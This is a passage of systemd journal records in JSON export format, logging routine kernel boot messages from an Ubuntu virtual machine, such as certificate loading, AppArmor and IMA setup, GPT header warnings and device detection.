"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=185;b=e2b08827b5804427b422c10c84f1567e;m=5733b5;t=5bd16dd1ab31d;x=c07c443d3e16db99", "__REALTIME_TIMESTAMP" : "1615280779997981", "__MONOTONIC_TIMESTAMP" : "5714869", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : 
"0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1135720", "MESSAGE" : "ledtrig-cpu: registered to indicate activity on CPUs" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=186;b=e2b08827b5804427b422c10c84f1567e;m=5733c0;t=5bd16dd1ab328;x=6a7777c70ce3a255", "__REALTIME_TIMESTAMP" : "1615280779997992", "__MONOTONIC_TIMESTAMP" : "5714880", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1138945", "MESSAGE" : "NET: Registered protocol family 10" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=187;b=e2b08827b5804427b422c10c84f1567e;m=5733cb;t=5bd16dd1ab333;x=4be3aaf7e9240aee", "__REALTIME_TIMESTAMP" : "1615280779998003", "__MONOTONIC_TIMESTAMP" : "5714891", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1145234", "MESSAGE" : "Segment Routing with IPv6" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=188;b=e2b08827b5804427b422c10c84f1567e;m=5733d6;t=5bd16dd1ab33e;x=4640c378a5cdf6da", "__REALTIME_TIMESTAMP" : "1615280779998014", "__MONOTONIC_TIMESTAMP" : "5714902", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1147095", "MESSAGE" : "NET: Registered protocol family 17" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=189;b=e2b08827b5804427b422c10c84f1567e;m=5733e1;t=5bd16dd1ab349;x=767dc5bae120251e", 
"__REALTIME_TIMESTAMP" : "1615280779998025", "__MONOTONIC_TIMESTAMP" : "5714913", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1149474", "MESSAGE" : "Key type dns_resolver registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18a;b=e2b08827b5804427b422c10c84f1567e;m=5733f1;t=5bd16dd1ab358;x=dc645808a879f3b", "__REALTIME_TIMESTAMP" : "1615280779998040", "__MONOTONIC_TIMESTAMP" : "5714929", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1152099", "MESSAGE" : "mce: Using 10 MCE banks" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18b;b=e2b08827b5804427b422c10c84f1567e;m=5733fc;t=5bd16dd1ab364;x=548f413767b00380", "__REALTIME_TIMESTAMP" : "1615280779998052", "__MONOTONIC_TIMESTAMP" : "5714940", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1154159", "MESSAGE" : "RAS: Correctable Errors collector initialized." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18c;b=e2b08827b5804427b422c10c84f1567e;m=573407;t=5bd16dd1ab36f;x=373f9d3379613ea0", "__REALTIME_TIMESTAMP" : "1615280779998063", "__MONOTONIC_TIMESTAMP" : "5714951", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1157286", "MESSAGE" : "sched_clock: Marking stable (1157251439, 0)->(1571788225, -414536786)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18d;b=e2b08827b5804427b422c10c84f1567e;m=573412;t=5bd16dd1ab37a;x=8c48752968bc386e", "__REALTIME_TIMESTAMP" : "1615280779998074", "__MONOTONIC_TIMESTAMP" : "5714962", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1161722", "MESSAGE" : "registered taskstats version 1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18e;b=e2b08827b5804427b422c10c84f1567e;m=57341d;t=5bd16dd1ab385;x=20a0aa6d8fdeab14", "__REALTIME_TIMESTAMP" : "1615280779998085", "__MONOTONIC_TIMESTAMP" : "5714973", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1163542", "MESSAGE" : "Loading compiled-in X.509 certificates" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18f;b=e2b08827b5804427b422c10c84f1567e;m=573429;t=5bd16dd1ab390;x=364a7ceb72127fa7", "__REALTIME_TIMESTAMP" : "1615280779998096", "__MONOTONIC_TIMESTAMP" : "5714985", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", 
"SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1167803", "MESSAGE" : "Loaded X.509 cert 'Build time autogenerated kernel key: 9d88e3c0462fa0d2df2917e8bbfdfdd1c55d8ddc'" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=190;b=e2b08827b5804427b422c10c84f1567e;m=573433;t=5bd16dd1ab39b;x=a7649390f19a2916", "__REALTIME_TIMESTAMP" : "1615280779998107", "__MONOTONIC_TIMESTAMP" : "5714995", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1171911", "MESSAGE" : "zswap: loaded using pool lzo/zbud" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=191;b=e2b08827b5804427b422c10c84f1567e;m=57343e;t=5bd16dd1ab3a6;x=14cb07770d36fce", "__REALTIME_TIMESTAMP" : "1615280779998118", "__MONOTONIC_TIMESTAMP" : "5715006", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1179054", "MESSAGE" : "Key type big_key registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=192;b=e2b08827b5804427b422c10c84f1567e;m=573449;t=5bd16dd1ab3b1;x=84725ba8ef890781", "__REALTIME_TIMESTAMP" : "1615280779998129", "__MONOTONIC_TIMESTAMP" : "5715017", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1181159", "MESSAGE" : "Key type trusted registered" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=193;b=e2b08827b5804427b422c10c84f1567e;m=573457;t=5bd16dd1ab3be;x=8c35f3d6f37cf7a", "__REALTIME_TIMESTAMP" : "1615280779998142", "__MONOTONIC_TIMESTAMP" : "5715031", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1184702", "MESSAGE" : "Key type encrypted registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=194;b=e2b08827b5804427b422c10c84f1567e;m=573462;t=5bd16dd1ab3ca;x=c87a6c56a1a279ae", "__REALTIME_TIMESTAMP" : "1615280779998154", "__MONOTONIC_TIMESTAMP" : "5715042", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1186983", "MESSAGE" : "AppArmor: AppArmor sha1 policy hashing enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=195;b=e2b08827b5804427b422c10c84f1567e;m=57346d;t=5bd16dd1ab3d5;x=c957789a9634f928", "__REALTIME_TIMESTAMP" : "1615280779998165", "__MONOTONIC_TIMESTAMP" : "5715053", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1190009", "MESSAGE" : "ima: No TPM chip found, activating TPM-bypass! 
(rc=-19)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=196;b=e2b08827b5804427b422c10c84f1567e;m=573478;t=5bd16dd1ab3e0;x=adfc620004c800d3", "__REALTIME_TIMESTAMP" : "1615280779998176", "__MONOTONIC_TIMESTAMP" : "5715064", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1193151", "MESSAGE" : "ima: Allocated hash algorithm: sha1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=197;b=e2b08827b5804427b422c10c84f1567e;m=573483;t=5bd16dd1ab3eb;x=693f53aec40a6152", "__REALTIME_TIMESTAMP" : "1615280779998187", "__MONOTONIC_TIMESTAMP" : "5715075", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1195370", "MESSAGE" : "evm: HMAC attrs: 0x1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=198;b=e2b08827b5804427b422c10c84f1567e;m=57348e;t=5bd16dd1ab3f6;x=ab505d66e5946eb3", "__REALTIME_TIMESTAMP" : "1615280779998198", "__MONOTONIC_TIMESTAMP" : "5715086", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1212166", "MESSAGE" : " Magic number: 13:673:120" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=199;b=e2b08827b5804427b422c10c84f1567e;m=573546;t=5bd16dd1ab4ae;x=33380f962a41035e", "__REALTIME_TIMESTAMP" : "1615280779998382", "__MONOTONIC_TIMESTAMP" : "5715270", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "misc", "_KERNEL_DEVICE" : "c10:236", "_UDEV_DEVNODE" : "/dev/mapper/control", "_UDEV_SYSNAME" : "device-mapper", "_SOURCE_MONOTONIC_TIMESTAMP" : "1214311", "MESSAGE" : "misc device-mapper: hash matches" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19a;b=e2b08827b5804427b422c10c84f1567e;m=5735e0;t=5bd16dd1ab547;x=6ddee31668d859d8", "__REALTIME_TIMESTAMP" : "1615280779998535", "__MONOTONIC_TIMESTAMP" : "5715424", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:00", "_UDEV_SYSNAME" : "00:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "1216895", "MESSAGE" : "rtc_cmos 00:00: setting system clock to 2021-03-09 09:06:15 UTC (1615280775)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19b;b=e2b08827b5804427b422c10c84f1567e;m=5735f4;t=5bd16dd1ab55c;x=4565413a50e75f50", "__REALTIME_TIMESTAMP" : "1615280779998556", "__MONOTONIC_TIMESTAMP" : "5715444", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1221337", "MESSAGE" : "BIOS EDD facility v0.16 2004-Jun-25, 0 devices found" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19c;b=e2b08827b5804427b422c10c84f1567e;m=573601;t=5bd16dd1ab569;x=f4f41e03b396a3ad", "__REALTIME_TIMESTAMP" : "1615280779998569", "__MONOTONIC_TIMESTAMP" : "5715457", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", 
"_SOURCE_MONOTONIC_TIMESTAMP" : "1224355", "MESSAGE" : "EDD information not available." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19d;b=e2b08827b5804427b422c10c84f1567e;m=57360e;t=5bd16dd1ab575;x=329d3d8c40cf755c", "__REALTIME_TIMESTAMP" : "1615280779998581", "__MONOTONIC_TIMESTAMP" : "5715470", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1229389", "MESSAGE" : "Freeing unused kernel image memory: 2436K" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19e;b=e2b08827b5804427b422c10c84f1567e;m=57361a;t=5bd16dd1ab581;x=e986ddf95cc1e0d4", "__REALTIME_TIMESTAMP" : "1615280779998593", "__MONOTONIC_TIMESTAMP" : "5715482", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1236019", "MESSAGE" : "Write protecting the kernel read-only data: 20480k" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19f;b=e2b08827b5804427b422c10c84f1567e;m=573628;t=5bd16dd1ab58f;x=a7162108f59cf17e", "__REALTIME_TIMESTAMP" : "1615280779998607", "__MONOTONIC_TIMESTAMP" : "5715496", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1240612", "MESSAGE" : "Freeing unused kernel image memory: 2008K" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a0;b=e2b08827b5804427b422c10c84f1567e;m=57363e;t=5bd16dd1ab5a5;x=2e6670b63c08b1f0", "__REALTIME_TIMESTAMP" : "1615280779998629", "__MONOTONIC_TIMESTAMP" : "5715518", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1243751", "MESSAGE" : "Freeing unused kernel image memory: 1972K" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a1;b=e2b08827b5804427b422c10c84f1567e;m=573652;t=5bd16dd1ab5ba;x=dc19fed6f929eec8", "__REALTIME_TIMESTAMP" : "1615280779998650", "__MONOTONIC_TIMESTAMP" : "5715538", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1254068", "MESSAGE" : "x86/mm: Checked W+X mappings: passed, no W+X pages found." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a2;b=e2b08827b5804427b422c10c84f1567e;m=57366f;t=5bd16dd1ab5d6;x=6c443cca0ce6637f", "__REALTIME_TIMESTAMP" : "1615280779998678", "__MONOTONIC_TIMESTAMP" : "5715567", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1257536", "MESSAGE" : "x86/mm: Checking user space page tables" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a3;b=e2b08827b5804427b422c10c84f1567e;m=57368a;t=5bd16dd1ab5f1;x=a5a65394811d4696", "__REALTIME_TIMESTAMP" : "1615280779998705", "__MONOTONIC_TIMESTAMP" : "5715594", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/mm: Checked W+X mappings: passed, no W+X pages found.", "_SOURCE_MONOTONIC_TIMESTAMP" : "1267705" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a4;b=e2b08827b5804427b422c10c84f1567e;m=573696;t=5bd16dd1ab5fd;x=b489bb420b8ec40e", "__REALTIME_TIMESTAMP" : "1615280779998717", "__MONOTONIC_TIMESTAMP" : "5715606", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1405178", "MESSAGE" : "FDC 0 is a S82078B" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a5;b=e2b08827b5804427b422c10c84f1567e;m=5736a5;t=5bd16dd1ab60c;x=817de7ebebd1e132", "__REALTIME_TIMESTAMP" : "1615280779998732", "__MONOTONIC_TIMESTAMP" : "5715621", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "1432467", "MESSAGE" : "GPT:Primary header thinks Alt. header is not at the end of the disk." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a6;b=e2b08827b5804427b422c10c84f1567e;m=5736b0;t=5bd16dd1ab618;x=4cac53a8770fc56d", "__REALTIME_TIMESTAMP" : "1615280779998744", "__MONOTONIC_TIMESTAMP" : "5715632", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "1436976", "MESSAGE" : "GPT:4612095 != 41943039" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a7;b=e2b08827b5804427b422c10c84f1567e;m=5736bc;t=5bd16dd1ab623;x=1f89e9c78d034e8f", "__REALTIME_TIMESTAMP" : "1615280779998755", "__MONOTONIC_TIMESTAMP" : "5715644", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "1438992", "MESSAGE" : "GPT:Alternate GPT header not at the end of the disk." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a8;b=e2b08827b5804427b422c10c84f1567e;m=5736c7;t=5bd16dd1ab62e;x=f98f5d259b2bc42", "__REALTIME_TIMESTAMP" : "1615280779998766", "__MONOTONIC_TIMESTAMP" : "5715655", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "MESSAGE" : "GPT:4612095 != 41943039", "_SOURCE_MONOTONIC_TIMESTAMP" : "1442022" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a9;b=e2b08827b5804427b422c10c84f1567e;m=5736d2;t=5bd16dd1ab63a;x=eec1178dae8a019d", "__REALTIME_TIMESTAMP" : "1615280779998778", "__MONOTONIC_TIMESTAMP" : "5715666", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "1443904", "MESSAGE" : "GPT: Use GNU Parted to correct GPT errors." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1aa;b=e2b08827b5804427b422c10c84f1567e;m=5736dd;t=5bd16dd1ab645;x=103e0e1edea30124", "__REALTIME_TIMESTAMP" : "1615280779998789", "__MONOTONIC_TIMESTAMP" : "5715677", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1446596", "MESSAGE" : " vda: vda1 vda14 vda15" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ab;b=e2b08827b5804427b422c10c84f1567e;m=5737aa;t=5bd16dd1ab712;x=5c729b3bea69173c", "__REALTIME_TIMESTAMP" : "1615280779998994", "__MONOTONIC_TIMESTAMP" : "5715882", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "+usb:1-1", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1448430", "MESSAGE" : "usb 1-1: new full-speed USB device number 2 using uhci_hcd" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ac;b=e2b08827b5804427b422c10c84f1567e;m=5737bc;t=5bd16dd1ab723;x=3f7f6606021883a3", "__REALTIME_TIMESTAMP" : "1615280779999011", "__MONOTONIC_TIMESTAMP" : "5715900", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1454205", "MESSAGE" : "input: VirtualPS/2 VMware VMMouse as /devices/platform/i8042/serio1/input/input4" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ad;b=e2b08827b5804427b422c10c84f1567e;m=5737c7;t=5bd16dd1ab72e;x=82b9b7cf8de193ea", "__REALTIME_TIMESTAMP" 